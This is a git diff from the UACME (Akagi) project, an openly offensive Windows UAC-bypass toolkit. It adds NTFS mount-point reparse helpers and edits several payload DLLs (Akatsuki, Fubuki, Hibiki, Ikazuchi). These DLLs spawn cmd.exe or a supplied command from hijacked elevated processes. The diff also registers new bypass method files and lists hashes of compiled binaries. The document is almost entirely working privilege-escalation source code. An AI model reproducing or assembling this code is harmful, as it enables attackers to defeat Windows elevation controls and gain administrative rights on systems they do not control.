+ IO_STATUS_BLOCK IoStatusBlock;
+
+ REPARSE_GUID_DATA_BUFFER Buffer;
+
+ RtlSecureZeroMemory(&Buffer, sizeof(REPARSE_GUID_DATA_BUFFER));
+ Buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
+
+ status = NtFsControlFile(hDirectory,
+ NULL,
+ NULL,
+ NULL,
+ &IoStatusBlock,
+ FSCTL_DELETE_REPARSE_POINT,
+ &Buffer,
+ REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
+ NULL,
+ 0);
+
+ if (status == STATUS_NOT_A_REPARSE_POINT) {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ }
+ else {
+ SetLastError(RtlNtStatusToDosError(status));
+ }
+
+ return NT_SUCCESS(status);
+}
+
+/*
+* supSetMountPoint
+*
+* Purpose:
+*
+* Install reparse point of type mount_point to directory.
+*
+*/
+BOOL supSetMountPoint(
+ _In_ HANDLE hDirectory,
+ _In_ LPWSTR lpTarget,
+ _In_ LPWSTR lpPrintName
+)
+{
+ ULONG memIO;
+ USHORT cbTarget, cbPrintName, reparseDataLength;
+ NTSTATUS status;
+ IO_STATUS_BLOCK IoStatusBlock;
+
+ REPARSE_DATA_BUFFER *Buffer;
+
+ if ((lpTarget == NULL) || (lpPrintName == NULL)) {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ return FALSE;
+ }
+
+ //
+ // Calculate required buffer size.
+ // Header + length of input strings + safe space.
+ //
+ cbTarget = (USHORT)(_strlen(lpTarget) * sizeof(WCHAR));
+ cbPrintName = (USHORT)(_strlen(lpPrintName) * sizeof(WCHAR));
+
+ reparseDataLength = cbTarget + cbPrintName + 12;
+ memIO = (ULONG)(reparseDataLength + REPARSE_DATA_BUFFER_HEADER_LENGTH);
+
+ Buffer = supHeapAlloc((SIZE_T)memIO);
+ if (Buffer == NULL)
+ return FALSE;
+
+ //
+ // Setup reparse point structure.
+ //
+ Buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
+ Buffer->ReparseDataLength = reparseDataLength;
+
+ //
+ // Add Target to PathBuffer.
+ //
+ Buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
+ Buffer->MountPointReparseBuffer.SubstituteNameLength = cbTarget;
+
+ RtlCopyMemory(Buffer->MountPointReparseBuffer.PathBuffer,
+ lpTarget,
+ cbTarget);
+
+ //
+ // Add PrintName to PathBuffer.
+ //
+ Buffer->MountPointReparseBuffer.PrintNameOffset = cbTarget + sizeof(UNICODE_NULL);
+ Buffer->MountPointReparseBuffer.PrintNameLength = cbPrintName;
+
+ RtlCopyMemory(&Buffer->MountPointReparseBuffer.PathBuffer[(cbTarget / sizeof(WCHAR)) + 1],
+ lpPrintName,
+ cbPrintName);
+
+ //
+ // Set reparse point.
+ //
+ status = NtFsControlFile(hDirectory,
+ NULL,
+ NULL,
+ NULL,
+ &IoStatusBlock,
+ FSCTL_SET_REPARSE_POINT,
+ Buffer,
+ memIO,
+ NULL,
+ 0);
+
+ supHeapFree(Buffer);
+
+ SetLastError(RtlNtStatusToDosError(status));
+ return NT_SUCCESS(status);
+}
diff --git a/Source/Akagi/sup.h b/Source/Akagi/sup.h
index b2ae77e..e795dec 100644
--- a/Source/Akagi/sup.h
+++ b/Source/Akagi/sup.h
@@ -4,9 +4,9 @@
*
* TITLE: SUP.H
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 26 May 2017
+* DATE: 11 June 2017
*
* Common header file for the program support routines.
*
@@ -28,12 +28,44 @@ typedef struct _SXS_SEARCH_CONTEXT {
LPWSTR FullDllPath;
} SXS_SEARCH_CONTEXT, *PSXS_SEARCH_CONTEXT;
+//ntifs.h
+typedef struct _REPARSE_DATA_BUFFER {
+ ULONG ReparseTag;
+ USHORT ReparseDataLength;
+ USHORT Reserved;
+ union {
+ struct {
+ USHORT SubstituteNameOffset;
+ USHORT SubstituteNameLength;
+ USHORT PrintNameOffset;
+ USHORT PrintNameLength;
+ ULONG Flags;
+ WCHAR PathBuffer[1];
+ } SymbolicLinkReparseBuffer;
+ struct {
+ USHORT SubstituteNameOffset;
+ USHORT SubstituteNameLength;
+ USHORT PrintNameOffset;
+ USHORT PrintNameLength;
+ WCHAR PathBuffer[1];
+ } MountPointReparseBuffer;
+ struct {
+ UCHAR DataBuffer[1];
+ } GenericReparseBuffer;
+ } DUMMYUNIONNAME;
+} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;
+
+#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
+
BOOLEAN supIsProcess32bit(
_In_ HANDLE hProcess);
BOOL supGetElevationType(
TOKEN_ELEVATION_TYPE *lpType);
+HANDLE supGetExplorerHandle(
+ VOID);
+
BOOL supWriteBufferToFile(
_In_ LPWSTR lpFileName,
_In_ PVOID Buffer,
@@ -133,4 +165,12 @@ BOOL supSetEnvVariable(
_In_ LPWSTR lpVariableName,
_In_opt_ LPWSTR lpVariableData);
+BOOL supSetMountPoint(
+ _In_ HANDLE hDirectory,
+ _In_ LPWSTR lpTarget,
+ _In_ LPWSTR lpPrintName);
+
+BOOL supDeleteMountPoint(
+ _In_ HANDLE hDirectory);
+
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)
diff --git a/Source/Akagi/tests/test.c b/Source/Akagi/tests/test.c
index ace80f0..c298360 100644
--- a/Source/Akagi/tests/test.c
+++ b/Source/Akagi/tests/test.c
@@ -4,9 +4,9 @@
*
* TITLE: TEST.C
*
-* VERSION: 2.72
+* VERSION: 2.74
*
-* DATE: 26 May 2017
+* DATE: 11 June 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj
index ff2e780..5271d8d 100644
--- a/Source/Akagi/uacme.vcxproj
+++ b/Source/Akagi/uacme.vcxproj
@@ -390,11 +390,13 @@
+
+
@@ -412,6 +414,7 @@
+
@@ -422,6 +425,7 @@
+
diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters
index 12b8e21..544eebe 100644
--- a/Source/Akagi/uacme.vcxproj.filters
+++ b/Source/Akagi/uacme.vcxproj.filters
@@ -129,6 +129,12 @@
Source Files\methods
+
+ Source Files\methods
+
+
+ Source Files\methods
+
@@ -209,6 +215,12 @@
Header Files\methods
+
+ Header Files\methods
+
+
+ Header Files\methods
+
diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user
index 9bd6ef8..3b328b0 100644
--- a/Source/Akagi/uacme.vcxproj.user
+++ b/Source/Akagi/uacme.vcxproj.user
@@ -17,11 +17,11 @@
WindowsLocalDebugger
- 0
+ 36
WindowsLocalDebugger
- 0
+ 36
WindowsLocalDebugger
\ No newline at end of file
diff --git a/Source/Akatsuki/dllmain.c b/Source/Akatsuki/dllmain.c
index 5e2802f..72a2786 100644
--- a/Source/Akatsuki/dllmain.c
+++ b/Source/Akatsuki/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 22 Mar 2017
+* DATE: 20 June 2017
*
* Proxy dll entry point, Akatsuki.
* Special dll for wow64 logger method.
@@ -147,9 +147,12 @@ BOOL ucmQueryCustomParameter(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
- GetStartupInfoW(&startupInfo);
+ GetStartupInfo(&startupInfo);
- bResult = CreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
+ bResult = CreateProcess(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
if (bResult) {
@@ -251,7 +254,7 @@ BOOL WINAPI DllMain(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
- GetStartupInfoW(&startupInfo);
+ GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ucmExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
@@ -260,7 +263,10 @@ BOOL WINAPI DllMain(
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe"));
- if (CreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL,
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
+ if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL,
sysdir, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);
diff --git a/Source/Akatsuki/version.rc b/Source/Akatsuki/version.rc
index 0c46580..3b95583 100644
Binary files a/Source/Akatsuki/version.rc and b/Source/Akatsuki/version.rc differ
diff --git a/Source/Fubuki/dll.vcxproj b/Source/Fubuki/dll.vcxproj
index 9fba274..2b6a755 100644
--- a/Source/Fubuki/dll.vcxproj
+++ b/Source/Fubuki/dll.vcxproj
@@ -336,11 +336,13 @@
+
+
diff --git a/Source/Fubuki/dll.vcxproj.filters b/Source/Fubuki/dll.vcxproj.filters
index 606e368..a9b5f13 100644
--- a/Source/Fubuki/dll.vcxproj.filters
+++ b/Source/Fubuki/dll.vcxproj.filters
@@ -55,6 +55,12 @@
minirtl
+
+ minirtl
+
+
+ minirtl
+
diff --git a/Source/Fubuki/dllmain.c b/Source/Fubuki/dllmain.c
index cc8a33d..83e031c 100644
--- a/Source/Fubuki/dllmain.c
+++ b/Source/Fubuki/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.71
+* VERSION: 2.74
*
-* DATE: 07 May 2017
+* DATE: 20 June 2017
*
* Proxy dll entry point, Fubuki Kai Ni.
*
@@ -84,13 +84,13 @@ void ucmShowProcessIntegrityLevel(
)
{
NTSTATUS status;
- HANDLE hToken;
+ HANDLE hToken = NULL;
- ULONG LengthNeeded;
+ ULONG LengthNeeded = 0;
PTOKEN_MANDATORY_LABEL pTIL = NULL;
DWORD dwIntegrityLevel;
- WCHAR *t = NULL;
+ LPWSTR lpText = NULL;
WCHAR szBuffer[MAX_PATH + 1];
status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &hToken);
@@ -109,25 +109,25 @@ void ucmShowProcessIntegrityLevel(
if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
{
- t = L"Low Process";
+ lpText = L"Low Process";
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&
dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
{
- t = L"Medium Process";
+ lpText = L"Medium Process";
}
else if (dwIntegrityLevel == SECURITY_MANDATORY_HIGH_RID)
{
- t = L"High Integrity Process";
+ lpText = L"High Integrity Process";
}
else if (dwIntegrityLevel == SECURITY_MANDATORY_SYSTEM_RID)
{
- t = L"System Integrity Process";
+ lpText = L"System Integrity Process";
}
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
wsprintf(szBuffer, L"PID=%lu, IntegrityLevel=%ws",
- GetCurrentProcessId(), t);
+ GetCurrentProcessId(), lpText);
}
LocalFree(pTIL);
@@ -135,7 +135,12 @@ void ucmShowProcessIntegrityLevel(
}
NtClose(hToken);
}
- if (t) MessageBox(GetDesktopWindow(), szBuffer, GetCommandLineW(), MB_ICONINFORMATION);
+ if (lpText) {
+ MessageBox(GetDesktopWindow(),
+ szBuffer,
+ GetCommandLine(),
+ MB_ICONINFORMATION);
+ }
}
/*
@@ -245,6 +250,7 @@ VOID DefaultPayload(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
+ //GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc
index b4e8bda..1e26504 100644
Binary files a/Source/Fubuki/version.rc and b/Source/Fubuki/version.rc differ
diff --git a/Source/Hibiki/dllmain.c b/Source/Hibiki/dllmain.c
index a984937..7b793ed 100644
--- a/Source/Hibiki/dllmain.c
+++ b/Source/Hibiki/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 21 Mar 2017
+* DATE: 20 June 2017
*
* AVrf entry point, Hibiki Kai Ni.
*
@@ -346,6 +346,9 @@ BOOL ucmQueryCustomParameter(
startupInfo.cb = sizeof(startupInfo);
ucmGetStartupInfo(&startupInfo);
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
bResult = pCreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
@@ -404,6 +407,9 @@ VOID ucmbRunTarget(
_strcpy_w(cmdbuf, sysdir);
_strcat_w(cmdbuf, L"cmd.exe");
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
if (pCreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
sysdir, &startupInfo, &processInfo))
{
diff --git a/Source/Hibiki/version.rc b/Source/Hibiki/version.rc
index 944db34..ddc0cf8 100644
Binary files a/Source/Hibiki/version.rc and b/Source/Hibiki/version.rc differ
diff --git a/Source/Ikazuchi/dllmain.c b/Source/Ikazuchi/dllmain.c
index 6d50933..118609e 100644
--- a/Source/Ikazuchi/dllmain.c
+++ b/Source/Ikazuchi/dllmain.c
@@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
-* VERSION: 2.70
+* VERSION: 2.74
*
-* DATE: 21 Mar 2017
+* DATE: 20 June 2017
*
* Proxy dll entry point, Ikazuchi.
*
@@ -402,7 +402,7 @@ BOOL ucmQueryCustomParameter(
HKEY hKey = NULL;
PVOID ProcessHeap = NtCurrentPeb()->ProcessHeap;
LPWSTR lpData = NULL, lpParameter = NULL, lpszParamKey = NULL;
- STARTUPINFOW startupInfo;
+ STARTUPINFO startupInfo;
PROCESS_INFORMATION processInfo;
ULONG bytesIO = 0L;
OBJSCANPARAM Param;
@@ -467,7 +467,10 @@ BOOL ucmQueryCustomParameter(
startupInfo.cb = sizeof(startupInfo);
GetStartupInfo(&startupInfo);
- bResult = CreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
+ bResult = CreateProcess(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
if (bResult) {
@@ -525,7 +528,7 @@ BOOL WINAPI DllMain(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
- GetStartupInfoW(&startupInfo);
+ GetStartupInfo(&startupInfo);
RtlSecureZeroMemory(sysdir, sizeof(sysdir));
cch = ExpandEnvironmentStrings(TEXT("%systemroot%\\system32\\"), sysdir, MAX_PATH);
@@ -534,7 +537,10 @@ BOOL WINAPI DllMain(
_strcpy(cmdbuf, sysdir);
_strcat(cmdbuf, TEXT("cmd.exe"));
- if (CreateProcessW(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
+ startupInfo.dwFlags = STARTF_USESHOWWINDOW;
+ startupInfo.wShowWindow = SW_SHOW;
+
+ if (CreateProcess(cmdbuf, NULL, NULL, NULL, FALSE, 0, NULL,
sysdir, &startupInfo, &processInfo))
{
CloseHandle(processInfo.hProcess);
diff --git a/Source/Ikazuchi/version.rc b/Source/Ikazuchi/version.rc
index 9b12193..25ecaee 100644
Binary files a/Source/Ikazuchi/version.rc and b/Source/Ikazuchi/version.rc differ
diff --git a/Source/Shared/ntos.h b/Source/Shared/ntos.h
index 8e4dc24..5ed07db 100644
--- a/Source/Shared/ntos.h
+++ b/Source/Shared/ntos.h
@@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
-* VERSION: 1.70
+* VERSION: 1.71
*
-* DATE: 27 May 2017
+* DATE: 28 May 2017
*
* Common header file for the ntos API functions and definitions.
*
@@ -5605,6 +5605,11 @@ NTSTATUS NTAPI NtDuplicateToken(
_Out_ PHANDLE NewTokenHandle
);
+#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
+#define SANDBOX_INERT 0x2 // winnt
+#define LUA_TOKEN 0x4
+#define WRITE_RESTRICT 0x8
+
NTSTATUS NTAPI NtFilterToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ULONG Flags,
@@ -5658,20 +5663,6 @@ NTSTATUS NTAPI NtQueryInformationToken(
_Out_ PULONG ReturnLength
);
-#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
-#define SANDBOX_INERT 0x2 // winnt
-#define LUA_TOKEN 0x4
-#define WRITE_RESTRICT 0x8
-
-NTSTATUS NTAPI NtFilterToken(
- _In_ HANDLE ExistingTokenHandle,
- _In_ ULONG Flags,
- _In_opt_ PTOKEN_GROUPS SidsToDisable,
- _In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
- _In_opt_ PTOKEN_GROUPS RestrictedSids,
- _Out_ PHANDLE NewTokenHandle
- );
-
NTSTATUS NTAPI NtCreateKey(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
diff --git a/Source/uacme.sln b/Source/uacme.sln
index 9333617..a290bd4 100644
--- a/Source/uacme.sln
+++ b/Source/uacme.sln
@@ -59,10 +59,10 @@ Global
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.Build.0 = Release|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.ActiveCfg = Release|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.Build.0 = Release|x64
- {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
- {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
- {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
- {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
+ {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = Release|Win32
+ {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = Release|Win32
+ {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = Release|x64
+ {210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = Release|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.ActiveCfg = Release|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.Build.0 = Release|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|x64.ActiveCfg = Debug|x64
diff --git a/UACME.sha256 b/UACME.sha256
index 5764dde..0f43c16 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -1,8 +1,8 @@
-46e4306bdea79c3e8269b78637bbbe510d6ee65ea18268f7788aec26b4806c41 *Compiled\Akagi32.exe
-b0e32db8c822014c282ef3aba46bac0bf934c4c3d0fcde2f3bf5f64f39789044 *Compiled\Akagi64.exe
+b20d491148d3a52b8de0783bc5879682b8f0a62c38e81b594a3848e2e918d059 *Compiled\Akagi32.exe
+a98802c8f2e68ff9568feaa1fb2e30e88601e1d50169454239d44f188bcf2482 *Compiled\Akagi64.exe
376d63708d4e0d761f6d9224b9d5504c07b3cd5b5ae5fd40a3a3d77c4d5873d5 *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
-4d14153dd95bd5441763283de03afb74aa5f3fc0b68d7629be43d27e3d41c5e1 *Source\uacme.sln
+4055ddeaea8805ded4aba4b730ed799e5187eaa29381c59f0ecc0f3a6d10b090 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
3fb2b94aa2ee33753fcc20fa1834be8a929a29248217cfb84a54956eeea1a824 *Source\Akagi\bin32res.h
@@ -11,92 +11,96 @@ c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdl
82684e4844773aa06296e76697cb2777bb4cb1cb23b06aa0c2dcc80fea33ca3d *Source\Akagi\bin64res.rc
a552fb7dfd3982f2ed58a745b928b8146a8632499dc01a64f534646caf02450e *Source\Akagi\compress.c
9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h
-ea90559a90c70292830258de4265a39fbab63408ab41711ad824eed5e6730fdf *Source\Akagi\consts.h
-5e5c5c2b73d8b4d1ac33a25714834349625a5f0e580582d0375fd0969d6d9297 *Source\Akagi\global.h
-1346bd4919e656fc5b3bff0f9e8b4b7ab928ad006b7af89952eef5275ae52220 *Source\Akagi\main.c
+2cd1eb208e9728b7cc3c2172b8ff0cb383b1aacef774d6b3aca704447e64b023 *Source\Akagi\consts.h
+2a14b3238a613d4d2beb9061771f27a4a8d55da2ec80e210cd7a8e84bb29ebb9 *Source\Akagi\global.h
+9d2fff691a6ac0fdddff9ff13523ed7933180b72d6a9cb4ccba5e9b425647c1c *Source\Akagi\main.c
a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-dae1ff25ab3cfa35aacd0eb1aace255ab4aa2c578d656fb81b13664d02d176e3 *Source\Akagi\Resource.rc
-1cf5e1ebaf5cfb80b420fb87ff8f7d31a2b9b75dc338edb4ea6820c4beeaf36c *Source\Akagi\sup.c
-37953ab7189a09fce908de75b5ce2871aaad5a04c78dca833e13318d93ece3a8 *Source\Akagi\sup.h
+b4fb5f94264c6275b862f56ed754e72c9858c9ab44fc2ee9f0d26fe1192f8295 *Source\Akagi\Resource.rc
+cb63e87aef0a85916b7d7d5881f41e1ca9800ddb878f242126110cd467653162 *Source\Akagi\sup.c
+0da9d7e9e882862172b7deaf5f95d0c1e18beb5bab8b2c699e6087b3d248f19f *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
-f7c0c94121c78c93f553c1841b9963a756fd0cb24dd384eeb434aac6349cd380 *Source\Akagi\uacme.vcxproj
-4f3e050a0b73b1b9b06c94ca375c4b9f19352fed23d18514fb116f236049f7eb *Source\Akagi\uacme.vcxproj.filters
-cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user
+5e9603e1877053c533994070273c4e72c39d9e0a7b26c008184acd5f7ca4cf3a *Source\Akagi\uacme.vcxproj
+e44d0f266561f7aef3b87a86d133a47af49cd920a66083804b02c889c73b4589 *Source\Akagi\uacme.vcxproj.filters
+d827c128f425851492e2e7ed1cf633fab3714c1499a41eae4e01bd8112c3ed73 *Source\Akagi\uacme.vcxproj.user
2d05d08e1436fa05e5247e876b3f187b3354b76f4cabfecbdc4e557968037424 *Source\Akagi\windefend.c
1b9e0a1f3734feb1d1f94defb48972b479225d76fc97997c9b240c0f3b6453a8 *Source\Akagi\windefend.h
-2944aac59b81edecf5a358be9b81d04d40774b8d0c0898b08ddf5de7992296d0 *Source\Akagi\bin\Akatsuki64.cd
-c29a55e1da15ee51bf197c190b4b802c03daf0ab66394c83dc9ae9409e55cc51 *Source\Akagi\bin\Fubuki32.cd
-76ebc6f06a8151396cd240d6bf772504cfc8b5eed6855e8653c60cdcf52e5d10 *Source\Akagi\bin\Fubuki64.cd
-945b6d413e4429dffc930f864595bf9f330067903a70f9d06ab93cb8106ae26c *Source\Akagi\bin\Hibiki32.cd
-92770263151595b6b152438a7e83028eee954cae818150e46d13bb1f8cc831df *Source\Akagi\bin\Hibiki64.cd
-7e1c3c9cb2ac6a7a4e822d4ac0e2fe7ae6adec19790a82fbbc8fc3a9e1f7c47c *Source\Akagi\bin\Ikazuchi32.cd
-d7928e793977925b9800926b567348517d23d7934ebb9f0992b9fc0c6b24d073 *Source\Akagi\bin\Ikazuchi64.cd
+47d2753928ca704a5544ca12fdff8583ff604ce2d440f3109ab3b6ded91b4b70 *Source\Akagi\bin\Akatsuki64.cd
+cbe156de6d8d3b5e10422f15a528050e348567ab9b98ac54b6e15b53025a9ed5 *Source\Akagi\bin\Fubuki32.cd
+d61fc7009f7fcfb12a8eab1ab024a3065bb0869fcf269794256b19e15ec6af34 *Source\Akagi\bin\Fubuki64.cd
+c1ed6f0600544df6921e7d51eb8e0f08ad853d0a3412c2962511306e7cf94add *Source\Akagi\bin\Hibiki32.cd
+0f4165ab7f6ac1b570022762d7a35aad0b61112edecfacda3a9f8ee5ade3b986 *Source\Akagi\bin\Hibiki64.cd
+83aca570f739d0c3492a0191bb4ea9f0986c5e1d0f05650f1f3945e0468eaf5f *Source\Akagi\bin\Ikazuchi32.cd
+2ca54d3cb0e1233f231a4c2dd7a576e705538dbdb53c8e11727c158bb1448513 *Source\Akagi\bin\Ikazuchi64.cd
46f01b4e452c8c6d4d62f7c99928dc13ec3a751512bfaaeebcbbbcf62523cd76 *Source\Akagi\bin\Kongou32.cd
4f336b9b9827366d686442ea6018d90e9cee1c876ea79c39a018d9fe0e164be8 *Source\Akagi\bin\Kongou64.cd
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
c38c4dc7d03484215e6fa531a795e80bd1951504ca6938cad5886d17adbf4a27 *Source\Akagi\methods\apphelp.h
-c994f782c64a1a18caaab60418de573ade7e87fdc964e25557ac79eb549c7cd5 *Source\Akagi\methods\carberp.c
-d9ac1c8eedf9c9d5ed6cbf0ffeeaa13ba376760ade0d1dc6750121ed48a5b63b *Source\Akagi\methods\carberp.h
+01f2327ec6dfdd859a5372f24dfaec5024fe3cd5795647991b79bbb88d19764e *Source\Akagi\methods\carberp.c
+b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\methods\carberp.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
-393ba6fbfe154be58e018066bb2edcce2abb2b6bc3a209de23a279a0edde153e *Source\Akagi\methods\enigma0x3.c
+5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c
+7c1e67ec03370d4e97fc5947a832090bf8283641c19f7cad1cb8f3d93385bac2 *Source\Akagi\methods\comfileop.h
+4336d458f3c40c5f874bd0db1e01bf29016ddb2c8ff807bbe4b89ff29e5127ac *Source\Akagi\methods\enigma0x3.c
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
be58d05b4f21e4cbc7a06d409c2f0002eee660d8a9017b1d103f35cdb7d9461c *Source\Akagi\methods\gootkit.c
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
-5887a1083e6343ea5e6effbd0def4631fc988df14e0a4c2147d68cb70e90fcf2 *Source\Akagi\methods\hybrids.c
-6327a9b8e9c19adee0d56e666756dd4a0edcc327c8ed0341f11bb80e12feaaa5 *Source\Akagi\methods\hybrids.h
-3155b7598ca2aad4e77a48f0351a8436c8780384820e83422bd8c2afb12a4586 *Source\Akagi\methods\methods.c
-adb791a9ef390b95f6f603c6e88c619c5031f42724843681b1562b9356d4d65a *Source\Akagi\methods\methods.h
-fd7e8e20de8f3763a418368431c0b6b7131d940e7b775c165b095f78386b849b *Source\Akagi\methods\pitou.c
